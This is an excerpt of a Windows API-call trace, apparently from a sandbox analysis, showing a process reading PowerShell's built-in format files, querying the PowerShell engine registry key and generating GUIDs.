	[0523.823] ReadFile (in: hFile=0x324, lpBuffer=0x2d47be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2d47be8*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.824] ReadFile (in: hFile=0x324, lpBuffer=0x2d47be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2d47be8*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.824] ReadFile (in: hFile=0x324, lpBuffer=0x2d47be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2d47be8*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.824] ReadFile (in: hFile=0x324, lpBuffer=0x2d47be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2d47be8*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.824] ReadFile (in: hFile=0x324, lpBuffer=0x2d47be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2d47be8*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.824] ReadFile (in: hFile=0x324, lpBuffer=0x2d47be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2d47be8*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.824] ReadFile (in: hFile=0x324, lpBuffer=0x2d47be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2d47be8*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.825] ReadFile (in: hFile=0x324, lpBuffer=0x2d47be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2d47be8*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.825] ReadFile (in: hFile=0x324, lpBuffer=0x2d47be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2d47be8*, lpNumberOfBytesRead=0x12cf18*=0xbce, lpOverlapped=0x0) returned 1
	[0523.825] ReadFile (in: hFile=0x324, lpBuffer=0x2d4731e, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2d4731e*, lpNumberOfBytesRead=0x12cf18*=0x0, lpOverlapped=0x0) returned 1
	[0523.825] ReadFile (in: hFile=0x324, lpBuffer=0x2d47be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2d47be8*, lpNumberOfBytesRead=0x12cf18*=0x0, lpOverlapped=0x0) returned 1
	[0523.826] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12cfa8 | out: phkResult=0x12cfa8*=0x324) returned 0x0
	[0523.826] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cf2c, lpData=0x0, lpcbData=0x12cf28*=0x0 | out: lpType=0x12cf2c*=0x1, lpData=0x0, lpcbData=0x12cf28*=0x56) returned 0x0
	[0523.826] CoTaskMemAlloc (cb=0x5a) returned 0x3b3da0
	[0523.826] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cefc, lpData=0x3b3da0, lpcbData=0x12cef8*=0x56 | out: lpType=0x12cefc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12cef8*=0x56) returned 0x0
	[0523.826] CoTaskMemFree (pv=0x3b3da0) 
	[0523.826] RegCloseKey (hKey=0x324) returned 0x0
	[0523.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0523.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0523.827] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x65d17b20, Data2=0x6993, Data3=0x4581, Data4=([0]=0xb6, [1]=0x51, [2]=0x3f, [3]=0x1e, [4]=0x63, [5]=0x24, [6]=0x9f, [7]=0x92))) returned 0x0
	[0523.828] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x34b4cb75, Data2=0xc730, Data3=0x4ee8, Data4=([0]=0xa0, [1]=0xf, [2]=0x70, [3]=0x9e, [4]=0xb7, [5]=0x16, [6]=0x21, [7]=0x65))) returned 0x0
	[0523.828] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xfaa63f33, Data2=0x564, Data3=0x41a6, Data4=([0]=0xba, [1]=0xa2, [2]=0xab, [3]=0x5c, [4]=0x8a, [5]=0x2f, [6]=0x36, [7]=0x7c))) returned 0x0
	[0523.828] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x3d924cc6, Data2=0xfe36, Data3=0x4c6d, Data4=([0]=0x8c, [1]=0x67, [2]=0xb7, [3]=0x25, [4]=0x9c, [5]=0x81, [6]=0xd0, [7]=0xc))) returned 0x0
	[0523.828] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xb2428df5, Data2=0x97ab, Data3=0x409c, Data4=([0]=0xa2, [1]=0x2, [2]=0x1e, [3]=0xeb, [4]=0xe8, [5]=0x23, [6]=0x60, [7]=0x88))) returned 0x0
	[0523.828] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x36bd5de5, Data2=0xb242, Data3=0x42ac, Data4=([0]=0xa7, [1]=0xb5, [2]=0x72, [3]=0x53, [4]=0x61, [5]=0x3c, [6]=0x37, [7]=0x2))) returned 0x0
	[0523.828] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xbb93cf44, Data2=0xe146, Data3=0x4b19, Data4=([0]=0x99, [1]=0x7a, [2]=0xf5, [3]=0x89, [4]=0x91, [5]=0x6d, [6]=0x9, [7]=0x51))) returned 0x0
	[0523.828] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x85d44a51, Data2=0x3c5c, Data3=0x4198, Data4=([0]=0xb5, [1]=0x18, [2]=0xde, [3]=0x8f, [4]=0xbe, [5]=0x3c, [6]=0x20, [7]=0xd6))) returned 0x0
	[0523.829] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x97b33eab, Data2=0x8511, Data3=0x4f4c, Data4=([0]=0x83, [1]=0xde, [2]=0x81, [3]=0x11, [4]=0x86, [5]=0x76, [6]=0x7b, [7]=0x7e))) returned 0x0
	[0523.829] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xe98063fa, Data2=0xf32b, Data3=0x4ab3, Data4=([0]=0x83, [1]=0xe8, [2]=0x1d, [3]=0xf5, [4]=0x16, [5]=0x83, [6]=0x36, [7]=0xac))) returned 0x0
	[0523.829] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x1d4d60cd, Data2=0x8a88, Data3=0x4978, Data4=([0]=0xa6, [1]=0xed, [2]=0xd, [3]=0x23, [4]=0xbb, [5]=0x26, [6]=0x60, [7]=0x34))) returned 0x0
	[0523.829] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x86bfbd06, Data2=0xcc21, Data3=0x4745, Data4=([0]=0xa7, [1]=0xa8, [2]=0x6, [3]=0x59, [4]=0xa, [5]=0x83, [6]=0x91, [7]=0xde))) returned 0x0
	[0523.829] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x93900e9d, Data2=0xb16, Data3=0x43d6, Data4=([0]=0x85, [1]=0x34, [2]=0xb3, [3]=0xbf, [4]=0x14, [5]=0x10, [6]=0x84, [7]=0x49))) returned 0x0
	[0523.829] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x4f9b222a, Data2=0xddf6, Data3=0x457b, Data4=([0]=0x9c, [1]=0x80, [2]=0x95, [3]=0xd2, [4]=0x45, [5]=0x2f, [6]=0x53, [7]=0xb))) returned 0x0
	[0523.830] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xbba96908, Data2=0xa8d9, Data3=0x4927, Data4=([0]=0xaa, [1]=0x4b, [2]=0xba, [3]=0xac, [4]=0x77, [5]=0x6b, [6]=0x36, [7]=0x5d))) returned 0x0
	[0523.830] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xca89d29f, Data2=0x72ea, Data3=0x4a65, Data4=([0]=0xa4, [1]=0x98, [2]=0x5, [3]=0x0, [4]=0xcf, [5]=0xcb, [6]=0xd8, [7]=0xc0))) returned 0x0
	[0523.830] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x2d16c40, Data2=0x1cbe, Data3=0x4955, Data4=([0]=0xab, [1]=0x1c, [2]=0x5a, [3]=0x5f, [4]=0xed, [5]=0x43, [6]=0xcd, [7]=0x25))) returned 0x0
	[0523.830] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xead36dbb, Data2=0xba85, Data3=0x42be, Data4=([0]=0xa7, [1]=0x7f, [2]=0x49, [3]=0xce, [4]=0xc7, [5]=0xe7, [6]=0x6a, [7]=0xa9))) returned 0x0
	[0523.830] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x74ad0a1a, Data2=0xddfe, Data3=0x45d7, Data4=([0]=0xb4, [1]=0x0, [2]=0x98, [3]=0x82, [4]=0x54, [5]=0x9a, [6]=0xa5, [7]=0xac))) returned 0x0
	[0523.830] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x755f81eb, Data2=0xc6b2, Data3=0x464e, Data4=([0]=0xa3, [1]=0x8c, [2]=0x77, [3]=0xf1, [4]=0xbd, [5]=0x38, [6]=0xda, [7]=0x9f))) returned 0x0
	[0523.830] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xfe6669a7, Data2=0x51b7, Data3=0x4373, Data4=([0]=0xa5, [1]=0x5, [2]=0xce, [3]=0x64, [4]=0xe4, [5]=0x13, [6]=0xd6, [7]=0x1f))) returned 0x0
	[0523.831] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x7fe582d6, Data2=0xccf7, Data3=0x4cdf, Data4=([0]=0xbe, [1]=0xd6, [2]=0x98, [3]=0x78, [4]=0x49, [5]=0xa5, [6]=0xe3, [7]=0x7b))) returned 0x0
	[0523.831] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x5ee7df1a, Data2=0xad63, Data3=0x4aff, Data4=([0]=0xb8, [1]=0xb5, [2]=0x65, [3]=0xcc, [4]=0x39, [5]=0xae, [6]=0xd1, [7]=0x79))) returned 0x0
	[0523.831] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x3ec7822e, Data2=0x91ac, Data3=0x434d, Data4=([0]=0xb0, [1]=0x2c, [2]=0xd3, [3]=0x89, [4]=0x7b, [5]=0xa5, [6]=0x6b, [7]=0x7d))) returned 0x0
	[0523.831] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xde6f4a37, Data2=0xb976, Data3=0x499f, Data4=([0]=0x90, [1]=0x93, [2]=0x70, [3]=0x29, [4]=0xd, [5]=0x67, [6]=0xb1, [7]=0xcb))) returned 0x0
	[0523.831] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x48d3498a, Data2=0x778b, Data3=0x4e32, Data4=([0]=0xac, [1]=0x97, [2]=0x87, [3]=0xc2, [4]=0x79, [5]=0x16, [6]=0x45, [7]=0x8b))) returned 0x0
	[0523.831] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xd0909e5a, Data2=0x4ee1, Data3=0x48db, Data4=([0]=0xb9, [1]=0x9d, [2]=0x44, [3]=0xf4, [4]=0x1b, [5]=0x8c, [6]=0x34, [7]=0x5d))) returned 0x0
	[0523.831] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x4c3b53ab, Data2=0xc326, Data3=0x4df8, Data4=([0]=0xb9, [1]=0x39, [2]=0x2b, [3]=0xff, [4]=0x9, [5]=0x38, [6]=0x9, [7]=0x28))) returned 0x0
	[0523.831] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x769a9051, Data2=0x78b1, Data3=0x48a0, Data4=([0]=0x8f, [1]=0x84, [2]=0xab, [3]=0xa2, [4]=0x67, [5]=0x14, [6]=0x33, [7]=0xc8))) returned 0x0
	[0523.832] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x72e8af2, Data2=0x9e8a, Data3=0x495a, Data4=([0]=0x9a, [1]=0x70, [2]=0x8e, [3]=0xf4, [4]=0x7c, [5]=0x7a, [6]=0x31, [7]=0xc6))) returned 0x0
	[0523.832] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xfd99191a, Data2=0xd521, Data3=0x4842, Data4=([0]=0x99, [1]=0xde, [2]=0xfc, [3]=0x75, [4]=0x40, [5]=0xfe, [6]=0x90, [7]=0x25))) returned 0x0
	[0523.832] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x8dff8d34, Data2=0xeb7e, Data3=0x48b4, Data4=([0]=0xbe, [1]=0x6, [2]=0x8d, [3]=0xec, [4]=0x24, [5]=0xd2, [6]=0xf, [7]=0x40))) returned 0x0
	[0523.832] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xd704c0fb, Data2=0x73aa, Data3=0x43d8, Data4=([0]=0xa9, [1]=0x97, [2]=0x56, [3]=0xa8, [4]=0xfa, [5]=0xdb, [6]=0x5f, [7]=0xf0))) returned 0x0
	[0523.832] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xa2a7615f, Data2=0x4c0b, Data3=0x4e06, Data4=([0]=0xbc, [1]=0xad, [2]=0xfe, [3]=0x2c, [4]=0x3c, [5]=0x15, [6]=0xc9, [7]=0xf0))) returned 0x0
	[0523.832] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x3d22f09d, Data2=0xb985, Data3=0x476d, Data4=([0]=0xa9, [1]=0x47, [2]=0x53, [3]=0xdc, [4]=0xb6, [5]=0x3d, [6]=0xaa, [7]=0x6c))) returned 0x0
	[0523.832] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x4da63f86, Data2=0x822a, Data3=0x436b, Data4=([0]=0x9d, [1]=0x73, [2]=0x9e, [3]=0xe8, [4]=0x7c, [5]=0xa6, [6]=0x44, [7]=0xa4))) returned 0x0
	[0523.833] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x22b4c665, Data2=0xea62, Data3=0x4573, Data4=([0]=0x95, [1]=0x5e, [2]=0x5c, [3]=0xe3, [4]=0xa4, [5]=0x6b, [6]=0x6b, [7]=0xb4))) returned 0x0
	[0523.833] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0523.833] GetFileType (hFile=0x324) returned 0x1
	[0523.833] SetErrorMode (uMode=0x1) returned 0x1
	[0523.833] GetFileType (hFile=0x324) returned 0x1
	[0523.833] ReadFile (in: hFile=0x324, lpBuffer=0x2e581d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2e581d0*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.834] ReadFile (in: hFile=0x324, lpBuffer=0x2e581d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2e581d0*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.834] ReadFile (in: hFile=0x324, lpBuffer=0x2e581d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2e581d0*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.835] ReadFile (in: hFile=0x324, lpBuffer=0x2e581d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2e581d0*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.835] ReadFile (in: hFile=0x324, lpBuffer=0x2e581d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2e581d0*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.835] ReadFile (in: hFile=0x324, lpBuffer=0x2e581d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2e581d0*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.835] ReadFile (in: hFile=0x324, lpBuffer=0x2e581d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2e581d0*, lpNumberOfBytesRead=0x12cf18*=0x119, lpOverlapped=0x0) returned 1
	[0523.835] ReadFile (in: hFile=0x324, lpBuffer=0x2e581d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2e581d0*, lpNumberOfBytesRead=0x12cf18*=0x0, lpOverlapped=0x0) returned 1
	[0523.836] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12cfa8 | out: phkResult=0x12cfa8*=0x324) returned 0x0
	[0523.836] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cf2c, lpData=0x0, lpcbData=0x12cf28*=0x0 | out: lpType=0x12cf2c*=0x1, lpData=0x0, lpcbData=0x12cf28*=0x56) returned 0x0
	[0523.836] CoTaskMemAlloc (cb=0x5a) returned 0x3b3da0
	[0523.836] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cefc, lpData=0x3b3da0, lpcbData=0x12cef8*=0x56 | out: lpType=0x12cefc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12cef8*=0x56) returned 0x0
	[0523.836] CoTaskMemFree (pv=0x3b3da0) 
	[0523.836] RegCloseKey (hKey=0x324) returned 0x0
	[0523.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0523.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0523.837] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xc75e6d32, Data2=0x680b, Data3=0x4427, Data4=([0]=0x9f, [1]=0xef, [2]=0xe6, [3]=0x82, [4]=0x53, [5]=0x7a, [6]=0x5, [7]=0x41))) returned 0x0
	[0523.837] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xfc9d75b, Data2=0x2c1c, Data3=0x4952, Data4=([0]=0x8a, [1]=0x27, [2]=0x35, [3]=0x71, [4]=0x41, [5]=0x9b, [6]=0xd1, [7]=0xda))) returned 0x0
	[0523.837] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x2d41590a, Data2=0xf300, Data3=0x4386, Data4=([0]=0x8d, [1]=0x8d, [2]=0x55, [3]=0x13, [4]=0x52, [5]=0x45, [6]=0x3, [7]=0xaa))) returned 0x0
	[0523.837] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x51bd297d, Data2=0x38a6, Data3=0x439e, Data4=([0]=0x93, [1]=0xe7, [2]=0x54, [3]=0xcc, [4]=0xcc, [5]=0x7d, [6]=0x44, [7]=0x47))) returned 0x0
	[0523.837] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0523.838] GetFileType (hFile=0x324) returned 0x1
	[0523.838] SetErrorMode (uMode=0x1) returned 0x1
	[0523.838] GetFileType (hFile=0x324) returned 0x1
	[0523.838] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.839] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.839] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.839] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.839] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.839] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.840] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.840] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.841] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.841] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.842] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.842] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.842] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.843] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.843] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.843] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.845] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.845] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.845] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.846] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.846] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.846] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
